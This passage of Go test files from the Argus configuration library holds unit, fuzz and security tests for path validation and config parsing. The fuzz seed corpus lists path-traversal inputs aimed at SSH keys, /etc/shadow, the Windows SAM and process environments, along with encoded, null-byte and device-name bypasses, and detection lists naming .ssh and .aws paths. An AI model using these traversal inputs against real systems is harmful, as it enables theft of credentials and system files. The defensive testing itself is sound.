	t.Run("close_alias_for_stop", func(t *testing.T) {
		watcher := helper.createWatcher()

		// Start watcher
		if err := watcher.Start(); err != nil {
			t.Fatalf("Failed to start watcher: %v", err)
		}

		// Close should work like Stop
		if err := watcher.Close(); err != nil {
			t.Errorf("Close() failed: %v", err)
		}

		// Should be stopped now
		if watcher.IsRunning() {
			t.Error("Watcher should be stopped after Close()")
		}
	})
}

```

## /argus_edge_test.go

```go path="/argus_edge_test.go" 
//argus_edge_test.go - Edge test cases for Argus
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"os"
	"path/filepath"
	"strings"
	"testing"
	"time"
)

// TestUnwatchErrorCases tests error cases in Unwatch function
func TestUnwatchErrorCases(t *testing.T) {
	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
	})

	// Test unwatching non-existent file (this should NOT error, just ignore)
	err := watcher.Unwatch("/non/existent/file.json")
	if err != nil {
		t.Logf("Unwatching non-existent file returned: %v", err)
	}

	// Test unwatching after stopping
	if err := watcher.Stop(); err != nil {
		// Only error if it's not "watcher is not running"
		if !strings.Contains(err.Error(), "watcher is not running") {
			t.Errorf("Failed to stop watcher: %v", err)
		}
	}
	err = watcher.Unwatch("/any/file.json")
	if err != nil {
		t.Logf("Unwatching after stop returned: %v", err)
	}
}

// TestRemoveFromCacheEdgeCases tests edge cases in removeFromCache
func TestRemoveFromCacheEdgeCases(t *testing.T) {
	watcher := New(Config{
		PollInterval: 100 * time.Millisecond,
		CacheTTL:     1 * time.Second,
	})

	// Add multiple entries to cache
	tmpDir := t.TempDir()
	testFiles := []string{
		filepath.Join(tmpDir, "test1.json"),
		filepath.Join(tmpDir, "test2.json"),
		filepath.Join(tmpDir, "test3.json"),
	}

	// Create files and add to cache
	for _, file := range testFiles {
		if err := os.WriteFile(file, []byte(`{"test": true}`), 0644); err != nil {
			t.Fatalf("Failed to create test file %s: %v", file, err)
		}
		_, err := watcher.getStat(file)
		if err != nil {
			t.Fatalf("Failed to get stat for %s: %v", file, err)
		}
	}

	// Remove files from cache one by one
	for _, file := range testFiles {
		watcher.removeFromCache(file)
	}

	// Verify cache is clean
	stats := watcher.GetCacheStats()
	if stats.Entries != 0 {
		t.Errorf("Expected 0 cache entries after removal, got %d", stats.Entries)
	}
}

// TestParseConfigErrorHandling tests error cases in ParseConfig
func TestParseConfigErrorHandling(t *testing.T) {
	// Test invalid JSON
	_, err := ParseConfig([]byte(`{invalid json`), FormatJSON)
	if err == nil {
		t.Errorf("Expected error for invalid JSON")
	}

	// Test invalid YAML - this might not always error depending on parser tolerance
	_, err = ParseConfig([]byte("invalid: yaml: content: ["), FormatYAML)
	if err != nil {
		t.Logf("YAML parser correctly detected error: %v", err)
	}

	// Test invalid TOML - this might not always error depending on parser tolerance
	_, err = ParseConfig([]byte(`[invalid toml content`), FormatTOML)
	if err != nil {
		t.Logf("TOML parser correctly detected error: %v", err)
	}

	// Test invalid HCL - this might not always error depending on parser tolerance
	_, err = ParseConfig([]byte(`invalid { hcl content`), FormatHCL)
	if err != nil {
		t.Logf("HCL parser correctly detected error: %v", err)
	}

	// Test unknown format
	_, err = ParseConfig([]byte(`content`), FormatUnknown)
	if err == nil {
		t.Errorf("Expected error for unknown format")
	}
}

// TestFlushBufferUnsafeEdgeCases tests edge cases in flushBufferUnsafe
func TestFlushBufferUnsafeEdgeCases(t *testing.T) {
	config := DefaultAuditConfig()
	config.BufferSize = 2 // Very small buffer
	config.Enabled = true

	tmpDir := t.TempDir()
	config.OutputFile = filepath.Join(tmpDir, "audit.log")

	logger, err := NewAuditLogger(config)
	if err != nil {
		t.Fatalf("Failed to create audit logger: %v", err)
	}
	defer func() {
		if err := logger.Close(); err != nil {
			t.Errorf("Failed to close logger: %v", err)
		}
	}()
	// Fill buffer to trigger flush
	logger.Log(AuditInfo, "Test message 1", "argus", "/test1.json", nil, nil, map[string]interface{}{"key": "value1"})
	logger.Log(AuditInfo, "Test message 2", "argus", "/test2.json", nil, nil, map[string]interface{}{"key": "value2"})
	logger.Log(AuditInfo, "Test message 3", "argus", "/test3.json", nil, nil, map[string]interface{}{"key": "value3"})

	// Force flush to test flush buffer unsafe
	if err := logger.Flush(); err != nil {
		t.Errorf("Failed to flush logger: %v", err)
	}

	// Verify audit file exists (accounting for SQLite backend auto-selection)
	if _, err := os.Stat(config.OutputFile); os.IsNotExist(err) {
		// Check if there's a SQLite file instead (backend auto-selection logic)
		sqliteFile := strings.Replace(config.OutputFile, ".log", ".db", 1)
		if _, err := os.Stat(sqliteFile); os.IsNotExist(err) {
			t.Logf("Neither JSONL nor SQLite audit file found - backend may have auto-selected different format")
			// This is acceptable with the new backend system
		}
	}
}

```

## /argus_fuzz_test.go

```go path="/argus_fuzz_test.go" 
// argus_fuzz_test.go - Comprehensive fuzz testing for Argus security-critical functions
//
// This file contains fuzz tests designed to find security vulnerabilities, edge cases,
// and unexpected behaviors in Argus input processing functions.
//
// Focus areas:
// - Path validation and sanitization (ValidateSecurePath)
// - Configuration parsing (ParseConfig)
// - Input validation and processing
//
// The fuzz tests use property-based testing to verify security invariants:
// - ValidateSecurePath should NEVER allow dangerous paths to pass
// - Parsers should handle malformed input gracefully without panics
// - All input validation should be consistent and robust
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"strings"
	"testing"
	"unicode"
)

// FuzzValidateSecurePath performs comprehensive fuzz testing on the ValidateSecurePath function.
//
// SECURITY PURPOSE: This fuzz test is critical for preventing directory traversal attacks.
// ValidateSecurePath is the primary defense against path-based security vulnerabilities,
// so thorough fuzzing is essential to find edge cases that could be exploited.
//
// TESTING STRATEGY:
// 1. Property-based testing: Verify security invariants hold for all inputs
// 2. Mutation-based: Start with known attack vectors and mutate them
// 3. Edge case generation: Test boundary conditions and unusual encodings
// 4. Cross-platform: Ensure consistent security across different OS path conventions
//
// SECURITY INVARIANTS TESTED:
// - No path containing ".." should ever be accepted as safe
// - No path accessing system directories should be accepted
// - No URL-encoded attack vectors should bypass validation
// - No Windows device names should be accepted
// - No control characters or null bytes should be accepted
// - Path length limits should be enforced consistently
//
// The fuzzer will help discover:
// - Unicode normalization attacks
// - Novel encoding bypass techniques
// - OS-specific path handling edge cases
// - Buffer overflow conditions with extremely long paths
// - Race conditions in validation logic
func FuzzValidateSecurePath(f *testing.F) {
	// SEED CORPUS: Based on real attack vectors and edge cases from existing tests
	// This provides the fuzzer with a good starting point for mutations

	// Basic valid paths that should always pass
	f.Add("config.json")
	f.Add("app/config.yaml")
	f.Add("/etc/argus/config.toml")
	f.Add("C:\\Program Files\\MyApp\\config.ini")
	f.Add(".gitignore") // Valid dot files
	f.Add("configs/database/prod.json")

	// Path traversal attack vectors - these should ALWAYS fail
	f.Add("../../../etc/passwd")
	f.Add("..\\..\\..\\windows\\system32\\config\\sam")
	f.Add("../../../../root/.ssh/id_rsa")
	f.Add("/var/www/../../../etc/shadow")
	f.Add("config/../../../proc/self/environ")
	f.Add("./../../etc/hosts")

	// URL-encoded attacks - should be detected and blocked
	f.Add("%2e%2e/%2e%2e/etc/passwd")
	f.Add("%252e%252e/etc/passwd") // Double encoded
	f.Add("..%2fetc%2fpasswd")     // Mixed encoding
	f.Add("%2e%2e\\%2e%2e\\windows\\system32")
	f.Add("config%00.txt") // Null byte injection

	// Windows-specific attack vectors
	f.Add("CON") // Device name
	f.Add("PRN.txt")
	f.Add("COM1.log")
	f.Add("LPT1.dat")
	f.Add("AUX.conf")
	f.Add("NUL.json")
	f.Add("file.txt:hidden") // Alternate Data Streams
	f.Add("config.json:$DATA")

	// System file access attempts
	f.Add("/etc/passwd")
	f.Add("/etc/shadow")
	f.Add("/proc/self/mem")
	f.Add("/sys/kernel/debug")
	f.Add("C:\\Windows\\System32\\config\\SAM")
	f.Add("C:\\WINDOWS\\SYSTEM32\\CONFIG\\SECURITY") // Case variations
	f.Add("/ETC/PASSWD")                             // Case variations for case-insensitive filesystems

	// Edge cases with special characters
	f.Add("config with spaces.json")
	f.Add("config-with-dashes.json")
	f.Add("config_with_underscores.json")
	f.Add("config.with.dots.json")
	f.Add("config@domain.json")
	f.Add("config#hash.json")
	f.Add("config$dollar.json")
	f.Add("config&amp.json")

	// Very long paths to test buffer limits
	f.Add(strings.Repeat("a", 100) + "/config.json")
	f.Add(strings.Repeat("dir/", 20) + "config.json")
	f.Add(strings.Repeat("../", 50) + "etc/passwd")

	// Unicode and encoding edge cases
	f.Add("café/config.json")  // Non-ASCII characters
	f.Add("конфиг.json")       // Cyrillic
	f.Add("設定.json")           // Chinese characters
	f.Add("config\u00A0.json") // Non-breaking space
	f.Add("config\u200B.json") // Zero-width space

	// Control characters and suspicious bytes
	f.Add("config\x00.json") // Null byte
	f.Add("config\x01.json") // SOH control char
	f.Add("config\x1F.json") // US control char
	f.Add("config\x7F.json") // DEL character
	f.Add("config\xFF.json") // High byte

	// Path normalization attack attempts
	f.Add("config/./../../etc/passwd")
	f.Add("config//..//../../etc/passwd")
	f.Add("config\\.\\.\\..\\..\\etc\\passwd")
	f.Add("config/.././../../etc/passwd")

	// Mixed separators and complex traversals
	f.Add("config\\../../../etc/passwd") // Mixed separators
	f.Add("config/..\\../etc/passwd")
	f.Add("config\\..\\../etc/passwd")
	f.Add("config/../..\\etc/passwd")

	// Execute the fuzz test with property-based validation
	f.Fuzz(func(t *testing.T, path string) {
		// Skip empty strings as they have a specific error case
		if path == "" {
			return
		}

		// Call the function under test
		err := ValidateSecurePath(path)

		// SECURITY INVARIANT 1: Paths with obvious traversal patterns should NEVER pass
		if containsDangerousTraversal(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Path with dangerous traversal was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 2: System file access should be blocked
		if containsSystemFileAccess(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: System file access was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 3: Windows device names should be blocked
		if containsWindowsDeviceName(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Windows device name was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 4: Control characters should be blocked
		if containsControlCharacters(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Path with control characters was accepted: %q", path)
			}
		}

		// SECURITY INVARIANT 5: Excessively long paths should be blocked
		if len(path) > 4096 {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Excessively long path was accepted (len=%d): %q", len(path), truncateString(path, 50))
			}
		}

		// SECURITY INVARIANT 6: Complex nested paths should be blocked
		separatorCount := strings.Count(path, "/") + strings.Count(path, "\\")
		if separatorCount > 50 {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: Overly complex path was accepted (separators=%d): %q", separatorCount, truncateString(path, 50))
			}
		}

		// SECURITY INVARIANT 7: URL-encoded dangerous patterns should be blocked
		if containsURLEncodedAttack(path) {
			if err == nil {
				t.Errorf("SECURITY VULNERABILITY: URL-encoded attack vector was accepted: %q", path)
			}
		}

		// BEHAVIORAL INVARIANT: Function should never panic
		// (This is implicitly tested by the fuzzer - if it panics, the test fails)

		// BEHAVIORAL INVARIANT: Error messages should not leak sensitive information
		if err != nil && containsSensitiveInfo(err.Error()) {
			t.Errorf("INFORMATION LEAK: Error message contains sensitive information: %v", err)
		}

		// PERFORMANCE INVARIANT: Function should complete in reasonable time
		// (Implicitly tested by fuzzer timeout mechanisms)
	})
}

// containsDangerousTraversal checks if a path contains obvious directory traversal patterns
func containsDangerousTraversal(path string) bool {
	lowerPath := strings.ToLower(path)

	dangerousPatterns := []string{
		"..",
		"../",
		"..\\",
		"/..",
		"\\..",
		"/../",
		"\\..\\",
	}

	for _, pattern := range dangerousPatterns {
		if strings.Contains(lowerPath, pattern) {
			return true
		}
	}
	return false
}

// containsSystemFileAccess checks if a path attempts to access system files
func containsSystemFileAccess(path string) bool {
	lowerPath := strings.ToLower(path)

	systemPaths := []string{
		"/etc/passwd",
		"/etc/shadow",
		"/etc/hosts",
		"/proc/",
		"/sys/",
		"/dev/",
		"windows/system32",
		"windows\\system32",
		"program files",
		".ssh/",
		".aws/",
	}

	for _, sysPath := range systemPaths {
		if strings.Contains(lowerPath, sysPath) {
			return true
		}
	}
	return false
}

// containsWindowsDeviceName mirrors the EXACT logic from ValidateSecurePath
// to ensure fuzzer consistency. This function should return true ONLY when
// ValidateSecurePath would actually reject the path for device name reasons.
func containsWindowsDeviceName(path string) bool {
	windowsDevices := []string{
		"CON", "PRN", "AUX", "NUL",
		"COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
		"LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
	}

	// First handle non-UNC paths (direct device name access)
	if !(strings.HasPrefix(path, "/") || strings.HasPrefix(path, "\\")) || len(path) <= 1 {
		baseName := getBaseName(path)
		baseUpper := strings.ToUpper(baseName)

		// Remove ALL extensions if present (handle multiple extensions)
		for {
			if dotIndex := strings.Index(baseUpper, "."); dotIndex != -1 {
				baseUpper = baseUpper[:dotIndex]
			} else {
				break
			}
		}

		for _, device := range windowsDevices {
			if baseUpper == device {
				return true
			}
		}
		return false
	}

	// UNC path logic - MIRROR ValidateSecurePath EXACTLY
	// Normalize the path: remove all leading slashes and backslashes
	normalizedPath := path
	for len(normalizedPath) > 0 && (normalizedPath[0] == '/' || normalizedPath[0] == '\\') {
		normalizedPath = normalizedPath[1:]
	}

	if len(normalizedPath) == 0 {
		return false
	}

	// Split by both types of separators to get path components
	normalizedForSplit := strings.ReplaceAll(normalizedPath, "\\", "/")
	components := strings.Split(normalizedForSplit, "/")

	if len(components) == 0 || components[0] == "" {
		return false
	}

	// Check if the first component is a device name
	firstComponent := strings.ToUpper(components[0])
	// Remove ALL extensions if present (handle multiple extensions)
	for {
		if dotIndex := strings.Index(firstComponent, "."); dotIndex != -1 {
			firstComponent = firstComponent[:dotIndex]
		} else {
			break
		}
	}

	// Always block if first component is a device name
	for _, device := range windowsDevices {
		if firstComponent == device {
			return true
		}
	}

	// Check second component only if specific conditions are met
	if len(components) >= 2 {
		secondComponent := strings.ToUpper(components[1])
		// Remove ALL extensions if present (handle multiple extensions)
		for {
			if dotIndex := strings.Index(secondComponent, "."); dotIndex != -1 {
				secondComponent = secondComponent[:dotIndex]
			} else {
				break
			}
		}

		// If second component is device AND first component looks suspicious (≤2 chars), block it
		for _, device := range windowsDevices {
			if secondComponent == device && len(components[0]) <= 2 {
				return true
			}
		}
	}

	return false
} // containsControlCharacters checks if a path contains dangerous control characters
func containsControlCharacters(path string) bool {
	for _, char := range path {
		// Allow tab, LF, CR but block other control characters
		if char < 32 && char != 9 && char != 10 && char != 13 {
			return true
		}
		// Block null byte specifically
		if char == 0 {
			return true
		}
	}
	return false
}

// containsURLEncodedAttack checks for URL-encoded attack patterns
func containsURLEncodedAttack(path string) bool {
	lowerPath := strings.ToLower(path)

	encodedPatterns := []string{
		"%2e%2e",     // ".." encoded
		"%252e%252e", // ".." double encoded
		"%2f",        // "/" encoded (in dangerous contexts)
		"%252f",      // "/" double encoded
		"%5c",        // "\" encoded
		"%255c",      // "\" double encoded
		"%00",        // null byte
		"%2500",      // null byte double encoded
	}

	for _, pattern := range encodedPatterns {
		if strings.Contains(lowerPath, pattern) {
			return true
		}
	}
	return false
}

// containsSensitiveInfo checks if an error message leaks sensitive information
func containsSensitiveInfo(errorMsg string) bool {
	lowerMsg := strings.ToLower(errorMsg)

	// Check for potentially sensitive information in error messages
	sensitivePatterns := []string{
		"password",
		"secret",
		"key",
		"token",
		"credential",
		"private",
		"/home/",
		"c:\\users\\",
	}

	for _, pattern := range sensitivePatterns {
		if strings.Contains(lowerMsg, pattern) {
			return true
		}
	}
	return false
}

// Helper functions

func getBaseName(path string) string {
	// Simple basename extraction - find last separator
	lastSlash := strings.LastIndex(path, "/")
	lastBackslash := strings.LastIndex(path, "\\")

	separator := lastSlash
	if lastBackslash > separator {
		separator = lastBackslash
	}

	if separator == -1 {
		return path
	}
	return path[separator+1:]
}

func truncateString(s string, maxLen int) string {
	if len(s) <= maxLen {
		return s
	}
	return s[:maxLen] + "..."
}

// FuzzParseConfig performs fuzz testing on the configuration parsing functionality.
//
// This secondary fuzz test targets the ParseConfig function which is another critical
// attack surface. Malformed configuration data could potentially cause:
// - Buffer overflows or memory corruption
// - Denial of service through resource exhaustion
// - Logic errors leading to security bypasses
// - Parser confusion attacks
//
// The fuzzer tests all supported configuration formats to ensure robust parsing.
func FuzzParseConfig(f *testing.F) {
	// Seed corpus with valid configurations in different formats
	f.Add([]byte(`{"key": "value", "number": 42}`), int(FormatJSON))
	f.Add([]byte("key: value\nnumber: 42"), int(FormatYAML))
	f.Add([]byte("key = \"value\"\nnumber = 42"), int(FormatTOML))
	f.Add([]byte("key=value\nnumber=42"), int(FormatINI))
	f.Add([]byte("key=value\nnumber=42"), int(FormatProperties))

	// Malformed inputs that should be handled gracefully
	f.Add([]byte(`{"invalid": json}`), int(FormatJSON))
	f.Add([]byte("invalid: yaml: content:"), int(FormatYAML))
	f.Add([]byte("invalid = toml = format"), int(FormatTOML))
	f.Add([]byte(""), int(FormatJSON)) // Empty input

	f.Fuzz(func(t *testing.T, data []byte, formatInt int) {
		// Convert int back to ConfigFormat, handle invalid values
		if formatInt < 0 || formatInt >= int(FormatUnknown) {
			return // Skip invalid format values
		}
		format := ConfigFormat(formatInt)

		// The function should never panic, regardless of input
		defer func() {
			if r := recover(); r != nil {
				t.Errorf("ParseConfig panicked with input format=%v, data length=%d: %v", format, len(data), r)
			}
		}()

		// Call function under test
		result, err := ParseConfig(data, format)

		// If parsing succeeds, result should be valid
		if err == nil {
			if result == nil {
				t.Errorf("ParseConfig returned nil result without error")
			}
			// Verify the result is a valid map
			for k := range result {
				if !isValidConfigKeyForFormat(k, format) {
					t.Errorf("ParseConfig produced invalid key: %q", k)
				}
			}
		}

		// Error messages should not contain raw input data to prevent info leaks
		if err != nil && len(data) > 0 && containsRawData(err.Error(), data) {
			t.Errorf("Error message contains raw input data, potential information leak")
		}
	})
}

// isValidConfigKeyForFormat checks if a configuration key is valid for a specific format
func isValidConfigKeyForFormat(key string, format ConfigFormat) bool {
	// Check for null bytes - never allowed in any format
	if strings.Contains(key, "\x00") {
		return false
	}

	// Format-specific validations
	switch format {
	case FormatJSON:
		// JSON allows empty keys and escaped control characters per RFC 7159
		// We are more strict here for security - only printable keys allowed
		if key == "" {
			return true // Empty keys allowed in JSON
		}
		// Check for dangerous control characters in JSON too
		for _, char := range key {
			if char < 32 && char != '\t' && char != '\n' && char != '\r' {
				return false
			}
			if !unicode.IsPrint(char) && char != '\t' {
				return false // Security policy: no non-printable chars in config keys
			}
		}
		return true
	case FormatYAML, FormatTOML, FormatINI, FormatProperties, FormatHCL:
		// These formats don't allow empty keys
		if key == "" {
			return false
		}
		// Check for dangerous control characters
		for _, char := range key {
			if char < 32 && char != '\t' && char != '\n' && char != '\r' {
				return false
			}
			if !unicode.IsPrint(char) && char != '\t' {
				return false
			}
		}
		return true
	default:
		// For unknown formats, be conservative
		if key == "" {
			return false
		}
		// Check for dangerous control characters
		for _, char := range key {
			if char < 32 && char != '\t' && char != '\n' && char != '\r' {
				return false
			}
			if !unicode.IsPrint(char) && char != '\t' {
				return false
			}
		}
		return true
	}
}

// containsRawData checks if error message contains portions of raw input data
func containsRawData(errorMsg string, data []byte) bool {
	dataStr := string(data)

	// Skip very short inputs (less than 8 chars) to avoid false positives with common words
	if len(dataStr) < 8 {
		return false
	}

	// For short inputs (8-15 chars), only flag if the entire input appears in error
	if len(dataStr) < 16 {
		return strings.Contains(errorMsg, dataStr)
	}

	// For longer inputs, check if significant chunks appear in error message
	if len(dataStr) > 50 {
		dataStr = dataStr[:50] // Check first 50 chars
	}

	return strings.Contains(errorMsg, dataStr)
}

// TestFuzzBypassAnalysis manually tests the bypass found by fuzzer
func TestFuzzBypassAnalysis(t *testing.T) {
	// Test the bypass found by fuzzer
	testPaths := []string{
		"//Con",
		"Con",
		"CON",
		"con",
		"//CON",
		"\\\\Con",
		"/Con",
		"//con",
		"/\\000/Con",   // Previous test case
		"PRN.0.",       // New fuzzer finding
		"COM1.txt.bak", // Multiple extensions
		"AUX.a.b.c",    // Many extensions
		"NUL...",       // Multiple dots
		"LPT1.exe.old", // Executable with backup extension
	}

	for _, path := range testPaths {
		err := ValidateSecurePath(path)
		t.Logf("Path: %-15s -> Error: %v", path, err)

		// Also test what our fuzzer functions think
		isDeviceName := containsWindowsDeviceName(path)
		t.Logf("  containsWindowsDeviceName(%q) = %v", path, isDeviceName)

		base := getBaseName(path) // Use our helper function
		t.Logf("  getBaseName(%q) = %q", path, base)
	}
} // TestUNCPathDeviceNameRegression tests the specific UNC path device name vulnerability
// that was found by the fuzzer to ensure it stays fixed.
//
// SECURITY: This is a regression test for CVE-equivalent vulnerability where UNC paths
// could bypass Windows device name validation, potentially allowing access to system devices.
func TestUNCPathDeviceNameRegression(t *testing.T) {
	// Test cases for UNC path device name bypass vulnerability
	maliciousUNCPaths := []struct {
		path        string
		description string
	}{
		{"//Con", "UNC path to CON device"},
		{"\\\\Con", "Windows UNC path to CON device"},
		{"//CON", "UNC path to CON device (uppercase)"},
		{"\\\\CON", "Windows UNC path to CON device (uppercase)"},
		{"//con", "UNC path to CON device (lowercase)"},
		{"\\\\con", "Windows UNC path to CON device (lowercase)"},
		{"//PRN", "UNC path to PRN device"},
		{"\\\\PRN", "Windows UNC path to PRN device"},
		{"//AUX", "UNC path to AUX device"},
		{"\\\\AUX", "Windows UNC path to AUX device"},
		{"//NUL", "UNC path to NUL device"},
		{"\\\\NUL", "Windows UNC path to NUL device"},
		{"//COM1", "UNC path to COM1 device"},
		{"\\\\COM1", "Windows UNC path to COM1 device"},
		{"//LPT1", "UNC path to LPT1 device"},
		{"\\\\LPT1", "Windows UNC path to LPT1 device"},
		{"//Con.txt", "UNC path to CON device with extension"},
		{"\\\\Con.txt", "Windows UNC path to CON device with extension"},
		{"//Con/subfolder", "UNC path to CON device with subfolder"},
		{"\\\\Con\\subfolder", "Windows UNC path to CON device with subfolder"},
		{"///Con", "Triple slash UNC path to CON device"},
		{"////CON", "Quad slash UNC path to CON device"},
		{"\\\\\\Con", "Triple backslash UNC path to CON device"},
		{"/////con.txt", "Many slash UNC path to CON device with extension"},
		{"/\\Con", "Mixed separator UNC path to CON device"},
		{"/\\0/Con", "Mixed separator with suspicious server name"},
		{"\\//Con", "Reverse mixed separator UNC path to CON device"},
	}

	for _, testCase := range maliciousUNCPaths {
		t.Run(testCase.description, func(t *testing.T) {
			err := ValidateSecurePath(testCase.path)

			// All these paths should be rejected for security
			if err == nil {
				t.Errorf("SECURITY REGRESSION: UNC path %q was accepted, should be blocked", testCase.path)
			}

			// Verify the error message indicates UNC path blocking
			if err != nil && !strings.Contains(err.Error(), "windows device name not allowed") {
				t.Errorf("Expected Windows device name error for %q, got: %v", testCase.path, err)
			}

			t.Logf("✓ UNC path %q correctly blocked: %v", testCase.path, err)
		})
	}

	// Edge cases found by fuzzer - needs analysis
	edgeCasePaths := []string{
		"//0/Con",    // Server "0" with folder "Con" - should this be allowed?
		"/\\000/Con", // Mixed separator server "000" with folder "Con" - attack or legitimate?
		"//srv/Con",  // Server "srv" with folder "Con" - clearly legitimate
		"//Con/srv",  // Device "Con" with folder "srv" - clearly attack
	}

	for _, path := range edgeCasePaths {
		t.Run("edge_case_"+path, func(t *testing.T) {
			err := ValidateSecurePath(path)
			// Log the current behavior for analysis
			t.Logf("Edge case path %q result: %v", path, err)

			// For now, we document this behavior but don't assert
			// This may be legitimate: server "0", folder "Con"
			// vs device access which should be blocked
		})
	}

	// Test that legitimate UNC paths (non-device) are still allowed
	legitimateUNCPaths := []string{
		"//server/share/config.json",
		"\\\\server\\share\\config.json",
		"//host/folder/app.yaml",
		"\\\\host\\folder\\app.yaml",
	}

	for _, path := range legitimateUNCPaths {
		t.Run("legitimate_"+path, func(t *testing.T) {
			err := ValidateSecurePath(path)
			// These should be allowed (non-device UNC paths)
			if err != nil && strings.Contains(err.Error(), "windows device name not allowed via UNC path") {
				t.Errorf("Legitimate UNC path %q was incorrectly blocked as device: %v", path, err)
			}
			t.Logf("UNC path %q result: %v", path, err)
		})
	}
}

```

## /argus_security_test.go

```go path="/argus_security_test.go" 
// argus_security_test.go: Comprehensive Security Testing Suite for Argus
//
// RED TEAM SECURITY ANALYSIS:
// This file implements systematic security testing against Argus configuration framework,
// designed to identify and prevent common attack vectors in production environments.
//
// THREAT MODEL:
// - Malicious configuration files (path traversal, injection attacks)
// - Environment variable poisoning and injection
// - Remote configuration server attacks (SSRF, content poisoning)
// - Resource exhaustion and DoS attacks
// - Audit trail manipulation and log injection
// - Race conditions and concurrent access vulnerabilities
//
// PHILOSOPHY:
// Each test is designed to be:
// - DRY (Don't Repeat Yourself) with reusable security utilities
// - SMART (Specific, Measurable, Achievable, Relevant, Time-bound)
// - COMPREHENSIVE covering all major attack vectors
// - WELL-DOCUMENTED explaining the security implications
//
// METHODOLOGY:
// 1. Identify attack surface and entry points
// 2. Create targeted exploit scenarios
// 3. Test boundary conditions and edge cases
// 4. Validate security controls and mitigations
// 5. Document vulnerabilities and remediation steps
//
// Copyright (c) 2025 AGILira - A. Giordano
// Series: an AGILira fragment
// SPDX-License-Identifier: MPL-2.0

package argus

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"sync"
	"testing"
	"time"
)

// =============================================================================
// SECURITY TESTING UTILITIES AND HELPERS
// =============================================================================

// SecurityTestContext provides utilities for security testing scenarios.
// This centralizes common security testing patterns and reduces code duplication.
type SecurityTestContext struct {
	t                *testing.T
	tempDir          string
	createdFiles     []string
	createdDirs      []string
	originalEnv      map[string]string
	cleanupFunctions []func()
	mu               sync.Mutex
}

// NewSecurityTestContext creates a new security testing context with automatic cleanup.
//
// SECURITY BENEFIT: Ensures test isolation and prevents test artifacts from
// affecting system security or other tests. Critical for reliable security testing.
func NewSecurityTestContext(t *testing.T) *SecurityTestContext {
	tempDir := t.TempDir() // Automatically cleaned up by testing framework

	ctx := &SecurityTestContext{
		t:                t,
		tempDir:          tempDir,
		createdFiles:     make([]string, 0),
		createdDirs:      make([]string, 0),
		originalEnv:      make(map[string]string),
		cleanupFunctions: make([]func(), 0),
	}

	// Register cleanup
	t.Cleanup(ctx.Cleanup)

	return ctx
}

// CreateMaliciousFile creates a file with potentially dangerous content for testing.
//
// SECURITY PURPOSE: Tests how Argus handles malicious configuration files,
// including path traversal attempts, injection payloads, and malformed content.
//
// Parameters:
//   - filename: Name of file to create (will be created in safe temp directory)
//   - content: Malicious content to write
//   - perm: File permissions (use restrictive permissions for security)
//
// Returns: Full path to created file for testing
func (ctx *SecurityTestContext) CreateMaliciousFile(filename string, content []byte, perm os.FileMode) string {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()

	// SECURITY: Always create files in controlled temp directory
	// This prevents accidental system file modification during testing
	filePath := filepath.Join(ctx.tempDir, filepath.Clean(filename))

	// Ensure directory exists
	dir := filepath.Dir(filePath)
	if err := os.MkdirAll(dir, 0755); err != nil {
		ctx.t.Fatalf("Failed to create directory for malicious file: %v", err)
	}

	// Create the malicious file
	if err := os.WriteFile(filePath, content, perm); err != nil {
		ctx.t.Fatalf("Failed to create malicious file: %v", err)
	}

	ctx.createdFiles = append(ctx.createdFiles, filePath)
	return filePath
}

// SetMaliciousEnvVar temporarily sets an environment variable to a malicious value.
//
// SECURITY PURPOSE: Tests environment variable injection and poisoning attacks.
// This is critical since many applications trust environment variables implicitly.
//
// The original value is automatically restored during cleanup to prevent
// contamination of other tests or the system environment.
func (ctx *SecurityTestContext) SetMaliciousEnvVar(key, maliciousValue string) {
	ctx.mu.Lock()
	defer ctx.mu.Unlock()

	// Store original value for restoration
	if _, exists := ctx.originalEnv[key]; !exists {
		ctx.originalEnv[key] = os.Getenv(key)
	}

	// Set malicious value
	if err := os.Setenv(key, maliciousValue); err != nil {
		ctx.t.Fatalf("Failed to set malicious environment variable %s: %v", key, err)
	}
}

// ExpectSecurityError validates that a security-related error occurred.
//
// SECURITY PRINCIPLE: Security tests should expect failures when malicious
// input is provided. If an operation succeeds with malicious input, that
// indicates a potential security vulnerability.
//
// This helper makes security test intentions clear and reduces boilerplate.
func (ctx *SecurityTestContext) ExpectSecurityError(err error, operation string) {
	if err == nil {
		ctx.t.Errorf("SECURITY VULNERABILITY: %s should have failed with malicious input but succeeded", operation)
	}
}

// ExpectSecuritySuccess validates that a legitimate operation succeeded.
//
// SECURITY PRINCIPLE: Security controls should not break legitimate functionality.
// This helper validates that security measures don't introduce false positives.
func (ctx *SecurityTestContext) ExpectSecuritySuccess(err error, operation string) {
	if err != nil {
		ctx.t.Errorf("SECURITY ISSUE: %s should have succeeded with legitimate input but failed: %v", operation, err)
	}
}

// CreatePathTraversalFile creates a file with path traversal attempts in the name.
//
// SECURITY PURPOSE: Tests whether Argus properly validates and sanitizes file paths
// to prevent directory traversal attacks that could access sensitive system files.
//
// Common path traversal patterns:
// - "../../../etc/passwd" (Unix path traversal)
// - "..\\..\\..\\windows\\system32\\config\\sam" (Windows path traversal)
// - URL-encoded variations (%2e%2e%2f, etc.)
// - Unicode variations (overlong UTF-8, etc.)
func (ctx *SecurityTestContext) CreatePathTraversalFile(traversalPath string, content []byte) string {
	// SECURITY NOTE: We create the file with a safe name in temp directory,
	// but test Argus with the dangerous traversal path
	safeName := strings.ReplaceAll(traversalPath, "/", "_")
	safeName = strings.ReplaceAll(safeName, "\\", "_")
	safeName = strings.ReplaceAll(safeName, "..", "dotdot")

